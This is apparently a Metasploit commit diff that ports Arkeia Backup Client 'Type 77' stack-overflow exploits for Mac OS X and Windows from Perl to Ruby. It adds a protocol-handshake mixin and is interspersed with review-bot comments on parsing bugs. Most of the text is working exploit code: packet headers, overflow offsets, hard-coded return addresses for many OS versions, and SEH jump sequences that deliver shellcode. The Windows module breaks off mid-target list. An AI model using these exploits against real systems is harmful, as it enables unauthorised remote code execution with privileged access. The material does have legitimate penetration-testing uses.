Arkeia exploits added
git-svn-id: file:///home/svn/incoming/trunk@3129 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
a990e20067
commit
40aa62968f
|
@ -1,238 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the Arkeia backup
|
||||
client for the Mac OS X platform. This vulnerability affects
|
||||
all versions up to and including 5.3.3 and has been tested
|
||||
with Arkeia 5.3.1 on Mac OS X 10.3.5.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '14011'],
|
||||
[ 'BID', '12594'],
|
||||
[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
|
||||
[ 'MIL', '6'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'MinNops' => 700,
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 18 2005',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::arkeia_type77_macos;
|
||||
use base "Msf::Exploit";
|
||||
use strict;
|
||||
use Pex::Text;
|
||||
use Pex::Arkeia;
|
||||
|
||||
my $advanced = { };
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
|
||||
'Arch' => [ 'ppc' ],
|
||||
'OS' => [ 'osx'],
|
||||
'Priv' => 1,
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The target port', 617],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'MinNops' => 700,
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module exploits a stack overflow in the Arkeia backup
|
||||
client for the Mac OS X platform. This vulnerability affects
|
||||
all versions up to and including 5.3.3 and has been tested
|
||||
with Arkeia 5.3.1 on Mac OS X 10.3.5.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['OSVDB', '14011'],
|
||||
['BID', '12594'],
|
||||
['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
|
||||
['MIL', '6'],
|
||||
],
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
['Arkeia 5.3.1 Stack Return (boot)', 0xbffff910 ],
|
||||
],
|
||||
|
||||
'Keys' => ['arkeia'],
|
||||
|
||||
'DisclosureDate' => 'Feb 18 2005',
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
|
||||
sub Check {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
);
|
||||
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return $self->CheckCode('Connect');
|
||||
}
|
||||
|
||||
$self->PrintLine("[*] Querying the Arkeia Backup Client...");
|
||||
my %info = Pex::Arkeia::ClientInfo($s);
|
||||
|
||||
# Give up if we did not get a version response back
|
||||
if (! $info{'Version'} ) {
|
||||
$self->PrintLine("[*] Error: ". $info{'Error'});
|
||||
return $self->CheckCode('Unknown');
|
||||
}
|
||||
|
||||
# Dump out the information returned by the server
|
||||
$self->PrintLine("[*] System Information");
|
||||
foreach my $inf (keys %info) {
|
||||
next if $inf eq 'Error';
|
||||
$self->PrintLine(" $inf: $info{$inf}");
|
||||
}
|
||||
|
||||
# Throw a warning if they are using the wrong exploit
|
||||
if ($info{'System'} !~ /Darwin/i) {
|
||||
$self->PrintLine("[*] This module is not able to exploit the ".$info{'System'}." platform");
|
||||
}
|
||||
|
||||
# We are going to assume that they will fix this in the next release
|
||||
if ($info{'Version'} =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/) {
|
||||
$self->PrintLine("[*] This system appears to be vulnerable");
|
||||
return $self->CheckCode('Confirmed');
|
||||
}
|
||||
|
||||
# This is more than likely not vulnerable...
|
||||
$self->PrintLine("[*] This version may not be vulnerable");
|
||||
|
||||
return $self->CheckCode('Safe');
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $target_idx = $self->GetVar('TARGET');
|
||||
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
|
||||
my $target = $self->Targets->[$target_idx];
|
||||
|
||||
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
);
|
||||
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return;
|
||||
}
|
||||
|
||||
my $head = "\x00\x4d\x00\x03\x00\x01\xff\xff";
|
||||
|
||||
# Request has to be big enough to find and small enough
|
||||
# not to write off the end of the stack. If we write too
|
||||
# far down, we also smash env[], which causes a crash in
|
||||
# getenv() before our function returns.
|
||||
|
||||
my $poof = Pex::Text::EnglishText(1200);
|
||||
|
||||
# Configure the length value of the data in the packet header
|
||||
substr($head, 6, 2, pack('n', length($poof)));
|
||||
|
||||
# Return back to the stack either directly or via system lib
|
||||
substr($poof, 0, 112, pack('N', $target->[1]) x (112 / 4));
|
||||
|
||||
# Huge nop slep followed by the payload
|
||||
substr($poof, 112, length($shellcode), $shellcode);
|
||||
|
||||
|
||||
$self->PrintLine("[*] Sending " .length($poof) . " bytes to remote host.");
|
||||
$s->Send($head);
|
||||
$s->Send($poof);
|
||||
|
||||
# Wait a few seconds for the payload to pop...
|
||||
$s->Recv(-1, 10);
|
||||
|
||||
# Call the payload handler if one exists
|
||||
$self->Handler($s);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -1,280 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the Arkeia backup
|
||||
client for the Windows platform. This vulnerability affects
|
||||
all versions up to and including 5.3.3.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '14011'],
|
||||
[ 'BID', '12594'],
|
||||
[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
|
||||
[ 'MIL', '7'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'win32',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 18 2005',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::arkeia_type77_win32;
|
||||
use base "Msf::Exploit";
|
||||
use strict;
|
||||
use Pex::Text;
|
||||
use Pex::Arkeia;
|
||||
|
||||
my $advanced = { };
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'win32'],
|
||||
'Priv' => 1,
|
||||
'AutoOpts' => { 'EXITFUNC' => 'process' },
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The target port', 617],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
|
||||
'Keys' => ['+ws2ord'],
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module exploits a stack overflow in the Arkeia backup
|
||||
client for the Windows platform. This vulnerability affects
|
||||
all versions up to and including 5.3.3.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['OSVDB', '14011'],
|
||||
['BID', '12594'],
|
||||
['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
|
||||
['MIL', '7'],
|
||||
],
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
['Arkeia 5.3.3 and 5.2.27 Windows (All)', 0x004130a2, 5 ], # arkeiad.exe
|
||||
['Arkeia 5.2.27 and 5.1.19 Windows (All)', 0x00407b9c, 5 ], # arkeiad.exe
|
||||
['Arkeia 5.3.3 and 5.0.19 Windows (All)', 0x0041d6b9, 5 ], # arkeiad.exe
|
||||
['Arkeia 5.1.19 and 5.0.19 Windows (All)', 0x00423264, 5 ], # arkeiad.exe
|
||||
['Arkeia 5.x Windows 2000 English', 0x75022ac4, 5 ], # ws2help.dll
|
||||
['Arkeia 5.x Windows XP English SP0/SP1', 0x71aa32ad, 5 ], # ws2help.dll
|
||||
['Arkeia 5.x Windows NT 4.0 SP4/SP5/SP6', 0x77681799, 5 ], # ws2help.dll
|
||||
['Arkeia 4.2 Windows 2000 English', 0x75022ac4, 4 ], # ws2help.dll
|
||||
['Arkeia 4.2 Windows XP English SP0/SP1', 0x71aa32ad, 4 ], # ws2help.dll
|
||||
['Arkeia 4.2 Windows NT 4.0 SP4/SP5/SP6', 0x77681799, 4 ], # ws2help.dll
|
||||
['Arkeia 4.2 Windows 2000 German', 0x74fa1887, 4 ], # ws2help.dll
|
||||
],
|
||||
|
||||
'Keys' => ['arkeia'],
|
||||
|
||||
'DisclosureDate' => 'Feb 18 2005',
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
sub Check {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
);
|
||||
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return $self->CheckCode('Connect');
|
||||
}
|
||||
|
||||
$self->PrintLine("[*] Querying the Arkeia Backup Client...");
|
||||
my %info = Pex::Arkeia::ClientInfo($s);
|
||||
|
||||
# Give up if we did not get a version response back
|
||||
if (! $info{'Version'} ) {
|
||||
$self->PrintLine("[*] Error: ". $info{'Error'});
|
||||
return $self->CheckCode('Unknown');
|
||||
}
|
||||
|
||||
# Dump out the information returned by the server
|
||||
$self->PrintLine("[*] System Information");
|
||||
foreach my $inf (keys %info) {
|
||||
next if $inf eq 'Error';
|
||||
$self->PrintLine(" $inf: $info{$inf}");
|
||||
}
|
||||
|
||||
# Throw a warning if they are using the wrong exploit
|
||||
if ($info{'System'} !~ /Windows/i) {
|
||||
$self->PrintLine("[*] This module is not able to exploit the ".$info{'System'}." platform");
|
||||
}
|
||||
|
||||
# We are going to assume that they will fix this in the next release
|
||||
if ($info{'Version'} =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/) {
|
||||
$self->PrintLine("[*] This system appears to be vulnerable");
|
||||
return $self->CheckCode('Confirmed');
|
||||
}
|
||||
|
||||
# This is more than likely not vulnerable...
|
||||
$self->PrintLine("[*] This version may not be vulnerable");
|
||||
|
||||
return $self->CheckCode('Safe');
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $target_idx = $self->GetVar('TARGET');
|
||||
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
|
||||
my $target = $self->Targets->[$target_idx];
|
||||
|
||||
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
);
|
||||
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return;
|
||||
}
|
||||
|
||||
my $head = "\x00\x4d\x00\x03\x00\x01\xff\xff";
|
||||
my $data;
|
||||
|
||||
if ($target->[2] == 5) {
|
||||
$data = $self->Arkeia5($target->[1], $shellcode);
|
||||
}
|
||||
|
||||
if ($target->[2] == 4) {
|
||||
$data = $self->Arkeia4($target->[1], $shellcode);
|
||||
}
|
||||
|
||||
# Configure the length value of the data in the packet header
|
||||
substr($head, 6, 2, pack('n', length($data)));
|
||||
|
||||
$self->PrintLine("[*] Sending " .length($data) . " bytes to remote host.");
|
||||
$s->Send($head);
|
||||
$s->Send($data);
|
||||
|
||||
# Takes a few seconds for the payload to pop (multiple exceptions)
|
||||
$s->Recv(-1, 10);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
sub Arkeia5 {
|
||||
my $self = shift;
|
||||
my $addr = shift;
|
||||
my $code = shift;
|
||||
my $poof = Pex::Text::EnglishText(4096);
|
||||
|
||||
# The return address is a pop/pop/ret in the executable or system lib
|
||||
substr($poof, 1176, 4, pack('V', $addr));
|
||||
|
||||
# The pop/pop/ret takes us here, jump back five bytes
|
||||
substr($poof, 1172, 2, "\xeb\xf9");
|
||||
|
||||
# Jump all the way back to our shellcode
|
||||
substr($poof, 1167, 5, "\xe9".pack('V', -1172));
|
||||
|
||||
# Place our shellcode in the beginning of the request
|
||||
substr($poof, 0, length($code), $code);
|
||||
|
||||
return $poof;
|
||||
}
|
||||
|
||||
sub Arkeia4 {
|
||||
my $self = shift;
|
||||
my $addr = shift;
|
||||
my $code = shift;
|
||||
my $poof = Pex::Text::EnglishText(4096);
|
||||
|
||||
# The return address is a pop/pop/ret in the executable or system lib
|
||||
substr($poof, 100, 4, pack('V', $addr));
|
||||
|
||||
# The pop/pop/ret takes us here, jump over the return address
|
||||
substr($poof, 96, 2, "\xeb\x06");
|
||||
|
||||
# Place our shellcode in the beginning of the request
|
||||
substr($poof, 104, length($code), $code);
|
||||
|
||||
return $poof;
|
||||
}
|
||||
|
||||
|
||||
1;
|
||||
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -212,7 +212,8 @@ class Exploit < Msf::Module
|
|||
require 'msf/core/exploit/http'
|
||||
require 'msf/core/exploit/dcerpc'
|
||||
require 'msf/core/exploit/mssql'
|
||||
|
||||
require 'msf/core/exploit/arkeia'
|
||||
|
||||
#
|
||||
# Creates an instance of the exploit module. Mad skillz.
|
||||
#
|
||||
|
|
|
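--- /dev/null
+++ b/PATH_NOT_SHOWN_ON_PAGE
@@ -0,0 +1,206 @@
+require 'msf/core'
+
+module Msf
+
+###
+#
+# This module exposes methods for manipulating the Arkeia backup service
+#
+###
+module Exploit::Remote::Arkeia
+
+include Exploit::Remote::Tcp
+
+#
+# Creates an instance of a MSSQL exploit module.
+#
+def initialize(info = {})
+super
+
+# Register the options that all FTP exploits may make use of.
+register_options(
+[
+Opt::RHOST,
+Opt::RPORT(617),
+], Msf::Exploit::Remote::Arkeia)
+
+self.recv_buff = ''
+end
+
+
+#
+# This method dumps some information about the service
+#
+def arkeia_info
+connect
+
+info = { }
+resp = ''
+
+# Authenticate1
+req = "\x00\x41\x00\x00\x00\x00\x00\x73"+
+"\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x7f\x00\x00\x01"+
+"\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x01\x00\x00\x7f\x41\x52\x4b\x41"+
+"\x44\x4d\x49\x4e\x00\x72\x6f\x6f"+
+"\x74\x00\x72\x6f\x6f\x74\x00\x00"+
+"\x00\x34\x2e\x33\x2e\x30\x2d\x31"+
+"\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00"
+
+sock.put(req)
+resp = arkeia_recv()
+if (not (resp and resp[0,4] == "\x00\x60\x00\x04"))
+disconnect
+return false
+end
+
+# Authenticate2
+req = "\x00\x73\x00\x00\x00\x00\x00\x0c" +
+"\x32\x00\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00"
+
+sock.put(req)
+resp = arkeia_recv()
+if (not (resp and resp[0,4] == "\x00\x60\x00\x04"))
+disconnect
+return false
+end
+
+# SessionSetup1
+req = "\x00\x61\x00\x04\x00\x01\x00\x15"+
+"\x00\x00\x31\x35\x33\x39\x38\x00"+
+"\x45\x4e\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00"
+
+sock.put(req)
+resp = arkeia_recv()
+if (not (resp and resp[0,4] == "\x00\x43\x00\x00"))
+disconnect
+return false
+end
+
+# Begin the ARKADMIN_GET_CLIENT_INFO request
+req = "\x00\x62\x00\x01\x00\x02\x00\x25"+
+"\x41\x52\x4b\x41\x44\x4d\x49\x4e"+
+"\x5f\x47\x45\x54\x5f\x43\x4c\x49"+
+"\x45\x4e\x54\x5f\x49\x4e\x46\x4f"+
+"\x00\x32\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00"
+
+sock.put(req)
+resp = arkeia_recv()
+if (not (resp and resp[0,4] == "\x00\x43\x00\x00"))
+disconnect
+return false
+end
+
+# Complete the ARKADMIN_GET_CLIENT_INFO request
+req = "\x00\x63\x00\x04\x00\x03\x00\x11"+
+"\x30\x00\x31\x00\x32\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00"
+
+sock.put(req)
+1.upto(5) { |i|
+resp = arkeia_recv()
+break if not resp
+break if resp =~ /VERSION/
+}
+
+if (not (resp and resp =~ /VERSION/))
+disconnect
+return false
+end
+
+# Store the version information
+mver = resp.match(/IVERSION\x00([^\x00]+)/)
+info['Version'] = mver[1] if mver
+
+# Store the hostname information
+mver = resp.match(/ISERVNAME\x00([^\x00]+)/)
+info['Hostname'] = mver[1] if mver
+
+# Begin the ARKADMIN_GET_MACHINE_INFO request
+req = "\x00\x62\x00\x01\x00\x02\x00\x26"+
+"\x41\x52\x4b\x41\x44\x4d\x49\x4e"+
+"\x5f\x47\x45\x54\x5f\x4d\x41\x43"+
+"\x48\x49\x4e\x45\x5f\x49\x4e\x46"+
+"\x4f\x00\x33\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00"
+
+sock.put(req)
+1.upto(5) { |i|
+resp = arkeia_recv()
+break if not resp
+break if resp[0,2] == "\x00\x43"
+}
+if (not (resp and resp[0,2] == "\x00\x43"))
+disconnect
+return info
+end
+
+# Complete the ARKADMIN_GET_MACHINE_INFO request
+req = "\x00\x63\x00\x04\x00\x03\x00\x11"+
+"\x30\x00\x31\x00\x33\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00"
+
+sock.put(req)
+1.upto(5) { |i|
+resp = arkeia_recv()
+break if not (resp and resp.length > 0)
+break if resp[0,2] == "\x00\x69"
+}
+if (not (resp and resp[0,2] == "\x00\x69"))
+disconnect
+return info
+end
+
+# Finally, parse out and store all the parameters
+resp.split("TPVALUE\x00").each { |x|
+minf = x.match(/^([^\x00]+)\x00PNAME\x00([^\x00]+)/)
+if (minf)
+info[ minf[2] ] = minf[1]
+end
+}
+
+disconnect
+return info
+end
+
+#
+# This method reads from the socket and parses out a single
+# arkeia response, buffering the rest
+#
+def arkeia_recv(nsock = self.sock)
+if (self.recv_buff.length < 8)
+self.recv_buff << (sock.get_once || '')
+end
+
+if (self.recv_buff.length < 8)
+return false
+end
+
+# Read the length header out of the message
+dlen = self.recv_buff[6, 2].unpack('n')[0]
+
+# Do we have the entire response message?
+if (self.recv_buff.length >= dlen + 8)
+return self.recv_buff.slice!(0, dlen + 8)
+end
+
+return false
+end
+
+
+attr_accessor :recv_buff
+end
+end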
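Review bot: arkeia_recv only reads from the socket while fewer than 8 bytes are buffered, so once a message header has arrived without its full `dlen` body every later call returns false without reading again, and the `1.upto(5)` retry loops in arkeia_info spin on the same stale buffer; the `nsock` parameter is also never used, the body calls `sock.get_once` directly. The rewrite below reads a second time when the buffer is shorter than `dlen + 8` and honours `nsock`. `recv_buff` is cleared only in initialize, so bytes left over from an earlier session survive the next `connect` in arkeia_info; `self.recv_buff = ''` right after that `connect` would keep the parser from reading stale data. The header comments `# Creates an instance of a MSSQL exploit module.` and `# Register the options that all FTP exploits may make use of.` look like copy-paste leftovers and should say Arkeia.
```ruby
def arkeia_recv(nsock = self.sock)
# Read when the buffer is short of the next message: first the
# 8-byte header, then header + dlen body.
if (self.recv_buff.length < 8)
self.recv_buff << (nsock.get_once || '')
end

if (self.recv_buff.length < 8)
return false
end

# Read the length header out of the message
dlen = self.recv_buff[6, 2].unpack('n')[0]

if (self.recv_buff.length < dlen + 8)
self.recv_buff << (nsock.get_once || '')
end

# Do we have the entire response message?
if (self.recv_buff.length >= dlen + 8)
return self.recv_buff.slice!(0, dlen + 8)
end

return false
end
```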
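--- /dev/null
+++ b/PATH_NOT_SHOWN_ON_PAGE
@@ -0,0 +1,106 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Osx::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
+
+include Exploit::Remote::Arkeia
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',
+'Description' => %q{
+This module exploits a stack overflow in the Arkeia backup
+client for the Mac OS X platform. This vulnerability affects
+all versions up to and including 5.3.3 and has been tested
+with Arkeia 5.3.1 on Mac OS X 10.3.5.
+
+},
+'Author' => [ 'hdm' ],
+'Version' => '$Revision$',
+'References' =>
+[
+[ 'OSVDB', '14011'],
+[ 'BID', '12594'],
+[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
+[ 'MIL', '6'],
+
+],
+'Privileged' => true,
+'Payload' =>
+{
+'Space' => 1000,
+'BadChars' => "\x00",
+'MinNops' => 700,
+
+},
+'Targets' =>
+[
+[
+'Arkeia 5.3.1 Stack Return (boot)',
+{
+'Platform' => 'osx',
+'Arch' => ARCH_PPC,
+'Ret' => 0xbffff910,
+},
+],
+],
+'DisclosureDate' => 'Feb 18 2005',
+'DefaultTarget' => 0))
+end
+
+def check
+info = arkeia_info()
+if(not (info and info['Version']))
+return Exploit::CheckCode::Safe
+end
+
+print_status("Arkeia Server Information:")
+info.each_pair { |k,v|
+print_status(" #{k + (" " * (30-k.length))} = #{v}")
+}
+
+if (info['System'] !~ /Darwin/)
+print_status("This module only supports Mac OS X targets")
+return Exploit::CheckCode::Detected
+end
+
+if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/)
+return Exploit::CheckCode::Vulnerable
+end
+
+return Exploit::CheckCode::Safe
+end
+
+def exploit
+connect
+
+# Request has to be big enough to find and small enough
+# not to write off the end of the stack. If we write too
+# far down, we also smash env[], which causes a crash in
+# getenv() before our function returns.
+
+head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
+buf = Rex::Text.rand_text_english(1200, payload_badchars)
+
+# Return back to the stack either directly or via system lib
+buf[0, 112] = [target.ret].pack('N') * (112/4)
+
+# Huge nop slep followed by the payload
+buf[112, payload.encoded.length] = payload.encoded
+
+head[6, 2] = [buf.length].pack('n')
+
+begin
+sock.put(head)
+sock.put(buf)
+sock.get_once
+rescue IOError, EOFError => e
+print_status("Exception: #{e.class}:#{e.to_s}")
+end
+handler
+disconnect
+end
+
+end
+end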
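Review bot: In check, `" " * (30-k.length)` raises ArgumentError (negative argument) as soon as a key returned by arkeia_info is longer than 30 characters, and those keys are the PNAME strings parsed straight out of the remote service's reply, so one long or malformed parameter name aborts the check instead of being printed; `print_status(" #{k.ljust(30)} = #{v}")` pads without that failure mode. The identical line appears in the Windows module's check in the next file section. check also answers Safe whenever arkeia_info returns false, which it does on an unexpected protocol reply at any of the handshake steps and not only on a missing version, so Safe may claim more than was actually established; a code that does not assert safety would be more accurate there, to be decided against the CheckCode values the framework offers. The `rescue IOError, EOFError` around the sends presumably does not cover the Rex socket error classes; worth confirming what `sock.put` and `sock.get_once` raise on a reset connection, since the first-stage `connect` already runs unguarded.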
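--- /dev/null
+++ b/PATH_NOT_SHOWN_ON_PAGE
@@ -0,0 +1,114 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
+
+include Exploit::Remote::Arkeia
+include Exploit::Remote::Seh
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',
+'Description' => %q{
+This module exploits a stack overflow in the Arkeia backup
+client for the Windows platform. This vulnerability affects
+all versions up to and including 5.3.3.
+
+},
+'Author' => [ 'hdm' ],
+'Version' => '$Revision$',
+'References' =>
+[
+[ 'OSVDB', '14011'],
+[ 'BID', '12594'],
+[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
+[ 'MIL', '7'],
+
+],
+'Privileged' => true,
+'DefaultOptions' =>
+{
+'EXITFUNC' => 'process',
+},
+'Payload' =>
+{
+'Space' => 1000,
+'BadChars' => "\x00",
+'StackAdjustment' => -3500,
+},
+
+'Targets' =>
+[
+['Arkeia 5.3.3 and 5.2.27 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x004130a2, 5 ] }], # arkeiad.exe
+['Arkeia 5.2.27 and 5.1.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00407b9c, 5 ] }], # arkeiad.exe
+['Arkeia 5.3.3 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x0041d6b9, 5 ] }], # arkeiad.exe
+['Arkeia 5.1.19 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00423264, 5 ] }], # arkeiad.exe
+['Arkeia 5.x Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 5 ] }], # ws2help.dll
+['Arkeia 5.x Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 5 ] }], # ws2help.dll
+['Arkeia 5.x Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 5 ] }], # ws2help.dll
+['Arkeia 4.2 Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 4 ] }], # ws2help.dll
+['Arkeia 4.2 Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 4 ] }], # ws2help.dll
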